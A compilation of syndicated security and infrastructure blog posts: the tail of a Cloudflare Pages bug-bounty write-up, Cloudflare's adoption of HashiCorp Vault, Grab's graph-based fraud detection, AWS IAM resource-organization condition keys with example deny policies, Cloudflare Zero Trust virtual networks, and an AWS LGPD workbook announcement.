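# Drop build-Pod traffic to the kubelet read-only port used in the PoC (illustrative rule only)
iptables -A FORWARD -d 10.124.200.1 -p tcp --dport 10255 -j DROP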

In the previously reported issues, we had robust logs showing that the attacks being performed had never been performed by anyone else. Logs related to inspecting Pods were not available to us, so we decided to notify all Cloudflare Pages customers that had ever had a build run on our Kubernetes-based infrastructure. After patching the issue and investigating which customers were impacted, we emailed impacted customers on February 3 to tell them that it’s possible someone other than the researcher had exploited this issue, because our logs couldn’t prove otherwise.

Takeaways

We are thankful for all the security research performed on our Pages product, and at such incredible depth. CI/CD and build infrastructure security problems are notoriously hard to prevent. A bug bounty that incentivizes researchers to keep coming back is invaluable, and we appreciate working with researchers who were flexible enough to perform great research and work with us as we re-architected the product for more robustness. An in-depth write-up of these issues is available from the Assetnote team on their website.

More than this, however, the work of all these researchers is one of the best ways to test the security architecture of any product. While it might seem counter-intuitive after a post listing out a number of bugs, all these diligent eyes on our products allow us to feel much more confident in the security architecture of Cloudflare Pages. We hope that our transparency, and our description of the work done on our security posture, enables you to feel more confident, too.

Finally: if you are a security researcher, we’d love to work with you to make our products more secure. Check out hackerone.com/cloudflare for more info!

Secret Management with HashiCorp Vault

Post Syndicated from Mitz Amano original https://blog.cloudflare.com/secret-management-with-hashicorp-vault/

Many applications these days require credentials for external systems, such as usernames and passwords to access databases, or service accounts to access cloud services. In such cases, private information, like passwords and keys, becomes necessary, and it is essential to take extra care in managing such sensitive data. For example, if you write your AWS key or a password into a deployment script and push it to a Git repository, everyone who can read the repository will also be able to access that secret, and you could be in trouble. Even if it’s an internal repository, you run the risk of a potential leak.

How we were managing secrets in the service

Before we talk about Vault, let’s take a look at how we used to manage secrets.

Salt

We use SaltStack as a bare-metal configuration management tool. The core of the Salt ecosystem consists of two major components: the Salt Master and the Salt Minion. The configuration state is owned by the Salt Master, and thousands of Salt Minions automatically install packages, generate configuration files, and start services on their nodes based on that state. The state may contain secrets, such as passwords and API keys. When we deploy secrets to a node, we encrypt the plaintext using a GPG key owned by the Salt Master and put the ASCII-armored secret into the state file. When the state is applied, the Salt Master decrypts the PGP message using its own key, and the Salt Minion retrieves the rendered data from the Master.
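
As a rough sketch of that encryption step (the recipient key ID is hypothetical), an operator armors the secret for the Salt Master's key and pastes the result into the state file:

# Encrypt a secret for the Salt Master's GPG key and print an ASCII-armored block to stdout
echo -n 'supersecret' | gpg --armor --encrypt --recipient salt-master@example.com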

Kubernetes

We were using Lockbox, a secure way to store your Kubernetes secrets offline. The secret is asymmetrically encrypted and can only be decrypted with the Lockbox Kubernetes controller. The controller synchronizes with Secret objects: a Secret generated from Lockbox will also be created in the corresponding namespace. Since namespaces have been assigned administrator privileges by each engineering team, ordinary users cannot read Secret objects.

Why these secrets management were insufficient

Prior to Vault, GnuPG and Lockbox were used in this way to encrypt and decrypt most secrets in the data center. Nevertheless, they were inadequate in certain cases:

  • Lack of scoping secrets: The secret data in ASCII-armor could only be decrypted by a specific node when the client read it. This was still not enough control. Salt owns a GPG key for each Salt Master, and Core services (k8s, Databases, Storage, Logging, Tracing, Monitoring, etc) are deployed to hundreds of Salt Minions by a few Salt Masters. Nodes are often reused as different services after repairing hardware failure, so we use the same GPG key to decrypt the secrets of various services. Therefore, having a GPG key for each service is complicated. Also, a specific secret is used only for a specific service. For example, an access key for object storage is needed to back up the repository. In previous configurations, the API key is decrypted by a common Salt Master, so there is a risk that the API key will be referenced by another service or for another purpose. It is impossible to scope secret access, as long as we use the same GPG key.

    Another case is Kubernetes. Namespace-scoped access control and the API access restrictions of the RBAC model are excellent. However, the etcd datastore used by Kubernetes is not encrypted by default, and Secret objects are stored there as well. We need to think about encryption-at-rest with a third-party KMS, or about how to prevent Secrets from being stored in etcd at all. In other words, access to the secret itself must also be properly controlled.

  • Rotation and static secrets: Anyone who has access to the Salt Master GPG key can theoretically decrypt all current and future secrets. And as long as we have many secrets, it’s impossible to rotate the encryption of all of them. Current and future secret management requires a process for easy rotation, and the use of dynamically generated secrets instead.
  • Session management: Users/Services with GPG keys can decrypt secrets at any time, so GPG secret decryption effectively has no TTL. (You can set an expiration date on the GPG key, but it’s just metadata: if you try to encrypt a new secret after the expiration date you’ll get a warning, but you can still decrypt existing secrets.) A temporary session is required to limit access when it’s not needed.
  • Audit: GPG doesn’t have a way to keep an audit trail. Audit trails help us trace who read which secrets, when, and from where. The audit trail should contain details including the date, time, and user information associated with each secret read (and login), regardless of whether it is a user or a service.

HashiCorp Vault

Armed with our set of requirements, we chose HashiCorp Vault to make better secret management with a better security model.

  • Scoping secrets: When a client logs in, a Vault token is generated through the Auth method (backend). This token carries a policy that defines access, so it is clear what data the client can reach after logging in.
  • Rotation and dynamic secrets: The version-controlled static secrets of the KV V2 Secret Engine help us easily update or roll back secrets with a single request. In addition, dynamic secrets and credentials are available to eliminate manual rotation. Ideally, secrets should be short-lived, rotated frequently, and accessible only to the service that needs them. These properties are essential to reduce the impact of an attack, but they are operationally difficult and impossible to satisfy without automation. Vault solves this problem by allowing operators to provide dynamically generated credentials to their services; Vault manages the credential lifecycle and rotates and revokes credentials as needed (see the sketch after this list).
  • Session management: Vault provides a login process to obtain a token, and various auth methods are available. It is possible to link with an Identity Provider and authenticate using a JWT. Since the Vault token has a TTL, it can be managed as a short-lived credential for accessing secrets.
  • Audit: Vault supports audit logs that record who accessed which Vault API, when, and from where.
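
A minimal sketch of what this looks like from the Vault CLI; the mount points and role name (secret/, database/creds/myapp-role) are hypothetical:

# Version-controlled static secret in the KV v2 engine
vault kv put secret/myapp/db password='v1-example'
vault kv put secret/myapp/db password='v2-example'      # writes a new version
vault kv rollback -version=1 secret/myapp/db            # roll back with a single request

# Dynamic, short-lived database credentials with a TTL managed by Vault
vault read database/creds/myapp-role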

We also built Vault clusters for HA, Reliability, and handling large numbers of requests.

  • We use Integrated Storage, so every node in the Vault cluster has a duplicate copy of Vault’s data and a client can retrieve the same result from any node.
  • Performance Replication keeps the clusters in sync, so we get the same result from any Vault cluster.
  • Requests from clients are routed from a single Service IP to one of the clusters. Anycast routes incoming traffic to the nearest cluster, which handles requests efficiently. If one cluster goes down, requests are automatically routed to another available cluster.

Service integrations

We use the appropriate Auth method (backend) and Secret Engine to integrate Vault with the services responsible for each core component.

Salt

The configuration state is owned by the Salt Master, and hundreds of Salt Minions automatically install packages, generate configuration files, and start services on their nodes based on their roles. The state data may contain secrets, such as API keys, and the Salt Minion retrieves them from Vault. Salt logs in to Vault through the JWT Auth method, using a JWT signed by the Salt Master.
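
A hedged sketch of that login from a Minion's perspective; the role name and token path are assumptions for illustration:

# Exchange the Salt Master-signed JWT for a Vault token via the JWT auth method
vault write auth/jwt/login role=salt-minion jwt=@/etc/salt/minion_token.jwt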

Kubernetes

Kubernetes reads Vault secrets through an operator that synchronizes them with Secret objects. The Kubernetes Auth method uses the Service Account token JWT to log in, just like the JWT Auth method. This JWT contains the service account name, UID, and namespace, and Vault can scope access to the namespace based on a dynamic policy.
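
A minimal sketch of the login call made on behalf of a Pod; the role name is hypothetical:

# The projected service account token identifies the Pod's namespace and service account
JWT=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
vault write auth/kubernetes/login role=myapp jwt="$JWT"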

Identity Provider – User login

Additionally, Vault can work with an Identity Provider through a delegated authorization method based on OAuth 2.0, so that users can get tokens with the right policies. The JWT issued by the Identity Provider contains the group or user ID to which the user belongs, and this metadata can be used to assign a Vault policy.
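
From a user's terminal, that flow can be as simple as the following sketch; the role name is an assumption, and the command opens a browser window for the Identity Provider login:

vault login -method=oidc role=engineer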

Integrated ecosystem – Auth x Secret

Vault provides a plugin system for two major components: authentication (Auth methods) and secret management (Secret Engines). Vault can enable the officially provided plugins as well as custom plugins you build yourself. Auth methods provide various ways to authenticate and obtain a Vault token. As mentioned in the service integration examples above, we mainly use JWT, OIDC, and Kubernetes for login. Secret engines, on the other hand, provide secrets in various ways, such as KV for static secrets, PKI for certificate signing and issuance, and so on.

And they form an ecosystem: Vault can easily integrate auth methods and secret engines with each other. For instance, if we add a database dynamic-credential secret engine, all existing platforms instantly gain support for it, without needing to reinvent how they authenticate to a separate service. Similarly, we can add a new platform into the mix, and it instantly has access to all the existing secret engines and their functionality. Additionally, Vault can enforce permissions on the endpoint paths provided by secret engines, based on the authentication method and policies.

Wrap up

Vault integration for the core components is already ongoing, and many GPG secrets have been migrated to Vault. We aim to expand service integrations in our data centers, adopt dynamic credentials, and improve CI/CD for Vault. Interested? We’re hiring for security platform engineering!

Graph Networks – Striking fraud syndicates in the dark

Post Syndicated from Grab Tech original https://engineering.grab.com/graph-networks


As a leading superapp in Southeast Asia, Grab serves millions of consumers daily. This naturally makes us a target for fraudsters, and to enhance our defences, the Integrity team at Grab has launched several hyper-scaled services, such as the Griffin real-time rule engine and Advanced Feature Engineering. These systems enable data scientists and risk analysts to develop real-time scoring and take fraudsters out of our ecosystems.

Apart from individual fraudsters, we have also observed the fast evolution of the dark side over time. We have had to evolve our defences to deal with professional syndicates that use advanced equipment such as device farms and GPS spoofing apps to perform fraud at scale. These professional fraudsters are able to camouflage themselves as normal users, making it significantly harder to identify them with rule-based detection.

Since 2020, Grab’s Integrity team has been advancing fraud detection with more sophisticated techniques and experimenting with a range of graph network technologies such as graph visualisations, graph neural networks and graph analytics. We’ve seen a lot of progress in this journey and will be sharing some key learnings that might help other teams who are facing similar issues.

What are Graph-based Prediction Platforms?

“You can fool some of the people all of the time, and all of the people some of the time, but you cannot fool all of the people all of the time.” – Abraham Lincoln

A Graph-based Prediction Platform connects multiple entities through one or more common features. When such entities are viewed as a macro graph network, we uncover new patterns that are otherwise unseen to the naked eye. For example, when investigating if two users are sharing IP addresses or devices, we might not be able to tell if they are fraudulent or just family members sharing a device.

However, if we use a graph system and look at all users sharing this device or IP address, it could show us if these two users are part of a much larger syndicate network in a device farming operation. In operations like these, we may see up to hundreds of other fake accounts that were specifically created for promo and payment fraud. With graphs, we can identify fraudulent activity more easily.
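
To give a rough sense of the idea, the sketch below builds a tiny user-device graph with the networkx library and surfaces clusters of accounts linked through shared devices or IP addresses. The data, threshold, and labels are invented for illustration and are not Grab's production pipeline:

import networkx as nx

# Toy events: each edge links a user to a device or IP address they have used
events = [
    ("user_1", "device_A"), ("user_2", "device_A"),
    ("user_2", "ip_10.0.0.7"), ("user_3", "ip_10.0.0.7"),
    ("user_4", "device_B"),  # an unrelated, likely legitimate user
]

G = nx.Graph()
G.add_edges_from(events)

# Connected components group every user reachable through shared devices or IPs;
# unusually large components are candidates for syndicate review
for component in nx.connected_components(G):
    users = sorted(n for n in component if n.startswith("user_"))
    if len(users) >= 3:
        print(f"Suspiciously connected cluster of {len(users)} users: {users}")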

Grab’s Graph-based Prediction Platform

Leveraging the power of graphs, the team has primarily built two types of systems:

  • Graph Database Platform: An ultra-scalable storage system with over one billion nodes that powers:
    1. Graph Visualisation: Risk specialists and data analysts can review user connections in real time and quickly capture new fraud patterns across more than 10 feature dimensions (see Fig 1).

      Fig 1: Graph visualisation
    2. Network-based feature system: A configurable system for engineers to adjust machine learning features based on network connectivity, e.g. the number of hops between two users or the number of shared devices between two IP addresses.

  • Graph-based Machine Learning: Unlike traditional fraud detection models, Graph Neural Networks (GNN) are able to utilise the structural correlations on the graph and act as a sustainable foundation to combat many different kinds of fraud. The data science team has built large-scale GNN models for scenarios like anti-money laundering and fraud detection.

    Fig 2 shows a money laundering network in which hundreds of accounts coordinate the placement of funds, layer the illicit money through a complex web of transactions that makes it hard to trace, and consolidate the funds into spending accounts.

Fig 2: Money Laundering Network

What’s next?

In the next article of our Graph Network blog series, we will dive deeper into how we develop the graph infrastructure and database using AWS Neptune. Stay tuned for the next part.

Join us

Grab is the leading superapp platform in Southeast Asia, providing everyday services that matter to consumers. More than just a ride-hailing and food delivery app, Grab offers a wide range of on-demand services in the region, including mobility, food, package and grocery delivery services, mobile payments, and financial services across 428 cities in eight countries.

Powered by technology and driven by heart, our mission is to drive Southeast Asia forward by creating economic empowerment for everyone. If this mission speaks to you, join our team today!

How to control access to AWS resources based on AWS account, OU, or organization

Post Syndicated from Rishi Mehrotra original https://aws.amazon.com/blogs/security/how-to-control-access-to-aws-resources-based-on-aws-account-ou-or-organization/

AWS Identity and Access Management (IAM) recently launched new condition keys to make it simpler to control access to your resources along your Amazon Web Services (AWS) organizational boundaries. AWS recommends that you set up multiple accounts as your workloads grow, and you can use multiple AWS accounts to isolate workloads or applications that have specific security requirements. By using the new conditions, aws:ResourceOrgID, aws:ResourceOrgPaths, and aws:ResourceAccount, you can define access controls based on an AWS resource’s organization, organizational unit (OU), or account. These conditions make it simpler to require that your principals (users and roles) can only access resources inside a specific boundary within your organization. You can combine the new conditions with other IAM capabilities to restrict access to and from AWS accounts that are not part of your organization.

This post will help you get started using the new condition keys. We’ll show the details of the new condition keys and walk through a detailed example based on the following scenario. We’ll also provide references and links to help you learn more about how to establish access control perimeters around your AWS accounts.

Consider a common scenario where you would like to prevent principals in your AWS organization from adding objects to Amazon Simple Storage Service (Amazon S3) buckets that don’t belong to your organization. To accomplish this, you can configure an IAM policy to deny access to S3 actions unless aws:ResourceOrgID matches your unique AWS organization ID. Because the policy references your entire organization, rather than individual S3 resources, you have a convenient way to maintain this security posture across any number of resources you control. The new conditions give you the tools to create a security baseline for your IAM principals and help you prevent unintended access to resources in accounts that you don’t control. You can attach this policy to an IAM principal to apply this rule to a single user or role, or use service control policies (SCPs) in AWS Organizations to apply the rule broadly across your AWS accounts. IAM principals that are subject to this policy will only be able to perform S3 actions on buckets and objects within your organization, regardless of their other permissions granted through IAM policies or S3 bucket policies.

New condition key details

You can use the aws:ResourceOrgID, aws:ResourceOrgPaths, and aws:ResourceAccount condition keys in IAM policies to place controls on the resources that your principals can access. The following list explains the new condition keys and the values these keys can take.

  • aws:ResourceOrgID: the AWS organization ID of the resource being accessed. All string operators; single-value key; the value is any AWS organization ID.
  • aws:ResourceOrgPaths: the organization path of the resource being accessed. All string operators; multi-value key; the values are organization paths composed of the AWS organization ID and organizational unit IDs.
  • aws:ResourceAccount: the AWS account ID of the resource being accessed. All string operators; single-value key; the value is any AWS account ID.

Note: Of the three keys, only aws:ResourceOrgPaths is a multi-value condition key, while aws:ResourceAccount and aws:ResourceOrgID are single-value keys. For information on how to use multi-value keys, see Creating a condition with multiple keys or values in the IAM documentation.

Resource owner keys compared to principal owner keys

The new IAM condition keys complement the existing principal condition keys aws:PrincipalAccount, aws:PrincipalOrgPaths, and aws:PrincipalOrgID. The principal condition keys help you define which AWS accounts, organizational units (OUs), and organizations are allowed to access your resources. For more information on the principal conditions, see Use IAM to share your AWS resources with groups of AWS accounts in AWS Organizations on the AWS Security Blog.

Using the principal and resource keys together helps you establish permission guardrails around your AWS principals and resources, and makes it simpler to keep your data inside the organization boundaries you define as you continue to scale. For example, you can define identity-based policies that prevent your IAM principals from accessing resources outside your organization (by using the aws:ResourceOrgID condition). Next, you can define resource-based policies that prevent IAM principals outside your organization from accessing resources that are inside your organization boundary (by using the aws:PrincipalOrgID condition). The combination of both policies prevents any access to and from AWS accounts that are not part of your organization. In the next sections, we’ll walk through an example of how to configure the identity-based policy in your organization. For the resource-based policy, you can follow along with the example in An easier way to control access to AWS resources by using the AWS organization of IAM principals on the AWS Security blog.
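
As a minimal sketch of the resource-based half of that perimeter, the following example applies a bucket policy that denies requests from principals outside your organization; the bucket name and organization ID are placeholders, and you would adapt the statement to your own requirements before applying it:

import json
import boto3

s3 = boto3.client("s3")

# Placeholder bucket name and organization ID
bucket_policy = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "DenyAccessFromOutsideMyOrg",
            "Effect": "Deny",
            "Principal": "*",
            "Action": "s3:*",
            "Resource": [
                "arn:aws:s3:::amzn-s3-demo-bucket",
                "arn:aws:s3:::amzn-s3-demo-bucket/*"
            ],
            "Condition": {
                "StringNotEquals": {"aws:PrincipalOrgID": "o-exampleorgid"}
            }
        }
    ]
}

s3.put_bucket_policy(
    Bucket="amzn-s3-demo-bucket",
    Policy=json.dumps(bucket_policy)
)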

Setup for the examples

In the following sections, we’ll show an example IAM policy for each of the new conditions. To follow along with Example 1, which uses aws:ResourceAccount, you’ll just need an AWS account.

To follow along with Examples 2 and 3 that use aws:ResourceOrgPaths and aws:ResourceOrgID respectively, you’ll need to have an organization in AWS Organizations and at least one OU created. This blog post assumes that you have some familiarity with the basic concepts in IAM and AWS Organizations. If you need help creating an organization or want to learn more about AWS Organizations, visit Getting Started with AWS Organizations in the AWS documentation.

Which IAM policy type should I use?

You can implement the following examples as identity-based policies, or in SCPs that are managed in AWS Organizations. If you want to establish a boundary for some of your IAM principals, we recommend that you use identity-based policies. If you want to establish a boundary for an entire AWS account or for your organization, we recommend that you use SCPs. Because SCPs apply to an entire AWS account, you should take care when you apply the following policies to your organization, and account for any exceptions to these rules that might be necessary for some AWS services to function properly.

Example 1: Restrict access to AWS resources within a specific AWS account

Let’s look at an example IAM policy that restricts access along the boundary of a single AWS account. For this example, say that you have an IAM principal in account 222222222222, and you want to prevent the principal from accessing S3 objects outside of this account. To create this effect, you could attach the following IAM policy.

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": " DenyS3AccessOutsideMyBoundary",
      "Effect": "Deny",
      "Action": [
        "s3:*"
      ],
      "Resource": "*",
      "Condition": {
        "StringNotEquals": {
          "aws:ResourceAccount": [
            "222222222222"
          ]
        }
      }
    }
  ]
}

Note: This policy is not meant to replace your existing IAM access controls, because it does not grant any access. Instead, this policy can act as an additional guardrail for your other IAM permissions. You can use a policy like this to prevent your principals from accessing any AWS accounts that you don’t know or control, regardless of the permissions granted through other IAM policies.

This policy uses a Deny effect to block access to S3 actions unless the S3 resource being accessed is in account 222222222222. This policy prevents S3 access to accounts outside the boundary of a single AWS account. You can use a policy like this one to limit your IAM principals to accessing only the resources inside your trusted AWS accounts. To implement a policy like this example yourself, replace account ID 222222222222 in the policy with your own AWS account ID. For a policy you can apply to multiple accounts while still maintaining this restriction, you could alternatively replace the account ID with the aws:PrincipalAccount condition key, to require that the principal and resource must be in the same account (see Example 3 in this post for more details on how to accomplish this).
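
For reference, a minimal sketch of that same-account variant is shown below, attached as an inline role policy with the AWS SDK for Python (Boto3). The role and policy names are hypothetical, and the main change from the example above is the ${aws:PrincipalAccount} policy variable in the condition:

import json
import boto3

iam = boto3.client("iam")

# Instead of hardcoding an account ID, require that the resource lives in the
# caller's own account by comparing against the ${aws:PrincipalAccount} variable
policy = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "DenyS3AccessOutsideCallersAccount",
            "Effect": "Deny",
            "Action": "s3:*",
            "Resource": "*",
            "Condition": {
                "StringNotEquals": {
                    "aws:ResourceAccount": "${aws:PrincipalAccount}"
                }
            }
        }
    ]
}

iam.put_role_policy(
    RoleName="example-workload-role",
    PolicyName="deny-s3-outside-own-account",
    PolicyDocument=json.dumps(policy)
)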

Organization setup: Welcome to AnyCompany

For the next two examples, we’ll use an example organization called AnyCompany that we created in AWS Organizations. You can create a similar organization to follow along directly with these examples, or adapt the sample policies to fit your own organization. Figure 1 shows the organization structure for AnyCompany.

Figure 1: Organization structure for AnyCompany

Like all organizations, AnyCompany has an organization root. Under the root are three OUs: Media, Sports, and Governance. Under the Sports OU, there are three more OUs: Baseball, Basketball, and Football. AWS accounts in this organization are spread across all the OUs based on their business purpose. In total, there are six OUs in this organization.

Example 2: Restrict access to AWS resources within my organizational unit

Now that you’ve seen what the AnyCompany organization looks like, let’s walk through another example IAM policy that you can use to restrict access to a specific part of your organization. For this example, let’s say you want to restrict S3 object access within the following OUs in the AnyCompany organization:

  • Media
  • Sports
  • Baseball
  • Basketball
  • Football

To define a boundary around these OUs, you don’t need to list all of them in your IAM policy. Instead, you can use the organization structure to your advantage. The Baseball, Basketball, and Football OUs share a parent, the Sports OU. You can use the new aws:ResourceOrgPaths key to prevent access outside of the Media OU, the Sports OU, and any OUs under it. Here’s the IAM policy that achieves this effect.

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": " DenyS3AccessOutsideMyBoundary",
      "Effect": "Deny",
      "Action": [
        "s3:*"
      ],
      "Resource": "*",
      "Condition": {
        "ForAllValues:StringNotLike": {
          "aws:ResourceOrgPaths": [
            "o-acorg/r-acroot/ou-acroot-mediaou/",
            "o-acorg/r-acroot/ou-acroot-sportsou/*"
          ] 
        }
      }
    }
  ]
}

Note: Like the earlier example, this policy does not grant any access. Instead, this policy provides a backstop for your other IAM permissions, preventing your principals from accessing S3 objects outside an OU-defined boundary. If you want to require that your IAM principals consistently follow this rule, we recommend that you apply this policy as an SCP. In this example, we attached this policy to the root of our organization, applying it to all principals across all accounts in the AnyCompany organization.

The policy denies access to S3 actions unless the S3 resource being accessed is in a specific set of OUs in the AnyCompany organization. This policy is identical to Example 1, except for the condition block: The condition requires that aws:ResourceOrgPaths contains any of the listed OU paths. Because aws:ResourceOrgPaths is a multi-value condition, the policy uses the ForAllValues:StringNotLike operator to compare the values of aws:ResourceOrgPaths to the list of OUs in the policy.

The first OU path in the list is for the Media OU. The second OU path is the Sports OU, but it also adds the wildcard character * to the end of the path. The wildcard * matches any combination of characters, and so this condition matches both the Sports OU and any other OU further down its path. Using wildcards in the OU path allows you to implicitly reference other OUs inside the Sports OU, without having to list them explicitly in the policy. For more information about wildcards, refer to Using wildcards in resource ARNs in the IAM documentation.

Example 3: Restrict access to AWS resources within my organization

Finally, we’ll look at a very simple example of a boundary that is defined at the level of an entire organization. This is the same use case as the preceding two examples (restrict access to S3 object access), but scoped to an organization instead of an account or collection of OUs.

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "DenyS3AccessOutsideMyBoundary",
      "Effect": "Deny",
      "Action": [
        "s3:*"
      ],
      "Resource": "arn:aws:s3:::*/*",
      "Condition": {
        "StringNotEquals": {
          "aws:ResourceOrgID": "${aws:PrincipalOrgID}"
        }
      }
    }
  ]
}

Note: Like the earlier examples, this policy does not grant any access. Instead, this policy provides a backstop for your other IAM permissions, preventing your principals from accessing S3 objects outside your organization regardless of their other access permissions. If you want to require that your IAM principals consistently follow this rule, we recommend that you apply this policy as an SCP. As in the previous example, we attached this policy to the root of our organization, applying it to all accounts in the AnyCompany organization.

The policy denies access to S3 actions unless the S3 resource being accessed is in the same organization as the IAM principal that is accessing it. This policy is identical to Example 1, except for the condition block: The condition requires that aws:ResourceOrgID and aws:PrincipalOrgID must be equal to each other. With this requirement, the principal making the request and the resource being accessed must be in the same organization. This policy also applies to S3 resources that are created after the policy is put into effect, so it is simple to maintain the same security posture across all your resources.

For more information about aws:PrincipalOrgID, refer to AWS global condition context keys in the IAM documentation.

Learn more

In this post, we explored the new conditions, and walked through a few examples to show you how to restrict access to S3 objects across the boundary of an account, OU, or organization. These tools work for more than just S3, though: You can use the new conditions to help you protect a wide variety of AWS services and actions. Here are a few links that you may want to look at:

If you have any questions, comments, or concerns, contact AWS Support or start a new thread on the AWS Identity and Access Management forum. Thanks for reading about this new feature. If you have feedback about this post, submit comments in the Comments section below.

Want more AWS Security news? Follow us on Twitter.

Rishi Mehrotra

Rishi is a Product Manager in AWS IAM. He enjoys working with customers and influencing product decisions. Prior to Amazon, Rishi worked for enterprise IT customers after receiving an engineering degree in computer science. He recently pursued an MBA at The University of Chicago Booth School of Business. Outside of work, Rishi enjoys biking, reading, and playing with his kids.

Michael Switzer

Mike is the product manager for the Identity and Access Management service at AWS. He enjoys working directly with customers to identify solutions to their challenges, and using data-driven decision making to drive his work. Outside of work, Mike is an avid cyclist and outdoorsperson. He holds a master’s degree in computational mathematics from the University of Washington.

Building many private virtual networks through Cloudflare Zero Trust

Post Syndicated from Nuno Diegues original https://blog.cloudflare.com/building-many-private-virtual-networks-through-cloudflare-zero-trust/

We built Cloudflare’s Zero Trust platform to help companies rely on our network to connect their private networks securely, while improving performance and reducing operational burden. With it, you could build a single virtual private network, where all your connected private networks had to be uniquely identifiable.

Starting today, we are thrilled to announce that you can start building many segregated virtual private networks over Cloudflare Zero Trust, beginning with virtualized connectivity for the connectors Cloudflare WARP and Cloudflare Tunnel.

Connecting your private networks through Cloudflare

Consider your team, with various services hosted across distinct private networks, and employees accessing those resources. More than ever, those employees may be roaming, remote, or actually in a company office. Regardless, you need to ensure only they can access your private services. Even then, you want to have granular control over what each user can access within your network.

This is where Cloudflare can help you. We make our global, performant network available to you, acting as a virtual bridge between your employees and private services. With your employees’ devices running Cloudflare WARP, their traffic egresses through Cloudflare’s network. On the other side, your private services are behind Cloudflare Tunnel, accessible only through Cloudflare’s network. Together, these connectors protect your virtual private network end to end.

[Image: Building many private virtual networks through Cloudflare Zero Trust]

The beauty of this setup is that your traffic is immediately faster and more secure. But you can then take it a step further and extract value from many Cloudflare services for your private network routed traffic: auditing, fine-grained filtering, data loss protection, malware detection, safe browsing, and many others.

Our customers are already in love with our Zero Trust private network routing solution. However, like all things we love, they can still improve.

The problem of overlapping networks

In the image above, the user can access any private service as if they were physically located within the network of that private service. For example, this means typing jira.intra in the browser or SSH-ing to a private IP 10.1.2.3 will work seamlessly despite neither of those private services being exposed to the Internet.

However, this has a big assumption in place: those underlying private IPs are assumed to be unique in the private networks connected to Cloudflare in the customer’s account.

Suppose now that your Team has two (or more) data centers that use the same IP space — usually referred to as a CIDR — such as 10.1.0.0/16. Maybe one is the current primary and the other is the secondary, replicating one another. In such an example situation, there would exist a machine in each of those two data centers, both with the same IP, 10.1.2.3.

Until today, you could not set up that via Cloudflare. You would connect data center 1 with a Cloudflare Tunnel responsible for traffic to 10.1.0.0/16. You would then do the same in data center 2, but receive an error forbidding you to create an ambiguous IP route:

$ cloudflared tunnel route ip add 10.1.0.0/16 dc-2-tunnel

API error: Failed to add route: code: 1014, reason: You already have a route defined for this exact IP subnet

In an ideal world, a team would not have this problem: every private network would have unique IP space. But that is just not feasible in practice, particularly for large enterprises. Consider the case where two companies merge: it is borderline impossible to expect them to rearrange their private networks to preserve IP addressing uniqueness.

Getting started on your new virtual networks

You can now overcome the problem above by creating unique virtual networks that logically segregate your overlapping IP routes. You can think of a virtual network as a group of IP subspaces. This effectively allows you to compose your overall infrastructure into independent (virtualized) private networks that are reachable by your Cloudflare Zero Trust organization through Cloudflare WARP.

Let us set up this scenario.

We start by creating two virtual networks, with one being the default:

$ cloudflared tunnel vnet add --default vnet-frankfurt "For London and Munich employees primarily"

Successfully added virtual network vnet-frankfurt with ID: 8a6ea860-cd41-45eb-b057-bb6e88a71692 (as the new default for this account)

$ cloudflared tunnel vnet add vnet-sydney "For APAC employees primarily"

Successfully added virtual network vnet-sydney with ID: e436a40f-46c4-496e-80a2-b8c9401feac7

We can then create the Tunnels and route the CIDRs to them:

$ cloudflared tunnel create tunnel-fra

Created tunnel tunnel-fra with id 79c5ba59-ce90-4e91-8c16-047e07751b42

$ cloudflared tunnel create tunnel-syd

Created tunnel tunnel-syd with id 150ef29f-2fb0-43f8-b56f-de0baa7ab9d8

$ cloudflared tunnel route ip add --vnet vnet-frankfurt 10.1.0.0/16 tunnel-fra

Successfully added route for 10.1.0.0/16 over tunnel 79c5ba59-ce90-4e91-8c16-047e07751b42

$ cloudflared tunnel route ip add --vnet vnet-sydney 10.1.0.0/16 tunnel-syd

Successfully added route for 10.1.0.0/16 over tunnel 150ef29f-2fb0-43f8-b56f-de0baa7ab9d8

And that’s it! Both your Tunnels can now be run and they will connect your private data centers to Cloudflare despite having overlapping IPs.

Your users will now be routed through the virtual network vnet-frankfurt by default. Should any user want otherwise, they can choose, in the WARP client settings, to be routed via vnet-sydney instead.

When the user changes the virtual network chosen, that informs Cloudflare’s network of the routing decision. This will propagate that knowledge to all our data centers via Quicksilver in a matter of seconds. The WARP client then restarts its connectivity to our network, breaking existing TCP connections that were being routed to the previously selected virtual network. This may be perceived as if you were disconnecting and reconnecting the WARP client.

Every current Cloudflare Zero Trust organization using private network routing will now have a default virtual network encompassing the IP Routes to Cloudflare Tunnels. You can start using the commands above to expand your private network to have overlapping IPs and reassign a default virtual network if desired.

If you do not have overlapping IPs in your private infrastructure, no action will be required.

What’s next

This is just the beginning of our support for distinct virtual networks at Cloudflare. As you may have seen, last week we announced the ability to create, deploy, and manage Cloudflare Tunnels directly from the Zero Trust dashboard. Today, virtual networks are only supported through the cloudflared CLI, but we are looking to integrate virtual network management into the dashboard as well.

Our next step will be to make Cloudflare Gateway aware of these virtual networks so that Zero Trust policies can be applied to these overlapping IP ranges. Once Gateway is aware of these virtual networks, we will also surface this concept with Network Logging for auditability and troubleshooting moving forward.

LGPD workbook for AWS customers managing personally identifiable information in Brazil

Post Syndicated from Rodrigo Fiuza original https://aws.amazon.com/blogs/security/lgpd-workbook-for-aws-customers-managing-personally-identifiable-information-in-brazil/

Portuguese version

AWS is pleased to announce the publication of the Brazil General Data Protection Law Workbook.

The General Data Protection Law (LGPD) in Brazil was first published on 14 August 2018 and came into effect on 18 August 2020. Companies that manage personally identifiable information (PII) in Brazil, as defined by the LGPD, will have to comply with the law.

To better help customers prepare and implement controls that focus on LGPD Chapter VII Security and Best Practices, AWS created a workbook based on industry best practices, AWS service offerings, and controls.

Amongst other topics, this workbook covers information security and AWS controls from:

In combination with Brazil General Data Protection Law Workbook, customers can use the detailed Navigating LGPD Compliance on AWS whitepaper.

AWS adheres to a shared responsibility model. Customers will have to observe which services offer privacy features and determine their applicability to their specific compliance requirements. Further information about data privacy at AWS can be found at our Data Privacy Center. Specific information about LGPD and data privacy at AWS in Brazil can be found on our Brazil Data Privacy page.

To learn more about our compliance and security programs, see AWS Compliance Programs. As always, we value your feedback and questions; reach out to the AWS Compliance team through the Contact Us page.

If you have feedback about this post, submit comments in the Comments section below.
Want more AWS Security news? Follow us on Twitter.
 


Portuguese

Workbook da LGPD para Clientes AWS que gerenciam Informações de Identificação Pessoal no Brasil

